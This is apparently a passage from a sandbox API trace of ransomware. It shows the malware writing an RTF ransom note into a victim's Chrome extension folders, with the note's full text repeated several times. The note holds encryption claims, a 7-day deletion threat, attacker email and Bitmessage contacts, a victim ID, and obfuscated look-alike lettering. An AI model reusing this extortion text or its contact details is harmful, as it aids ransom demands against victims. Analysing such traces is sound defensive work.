EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.516] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.517] CloseHandle (hObject=0x2c8) returned 1 [0272.517] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0272.517] GetLastError () returned 0x2 [0272.517] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.518] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.518] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of 